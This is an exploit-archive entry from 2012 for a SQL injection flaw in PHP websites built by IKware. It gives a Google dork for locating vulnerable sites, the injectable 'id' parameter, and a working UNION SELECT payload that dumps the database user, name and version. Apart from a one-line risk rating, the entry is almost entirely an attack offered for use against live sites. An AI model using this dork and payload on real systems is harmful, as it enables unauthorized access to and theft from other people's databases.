IKware Sql Injection Vulnerability

2012-09-13T00:00:00
ID 1337DAY-ID-19398
Type zdt
Reporter Sys32
Modified 2012-09-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IKware Sql Injection Vulnerability
# Google Dork: intext:"Desenvolvido por IKware" inurl:".php?id="
# Date: 13/9/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.ikware.com/
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to sql injection, allowing to gain full access to the database.
# Column counts differ from website to another.
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://Vull-Site.com/***.php?id=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
# http://Vull-Site.com/***.php?id=9 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,28,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote sql injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''



#  0day.today [2018-04-01]  #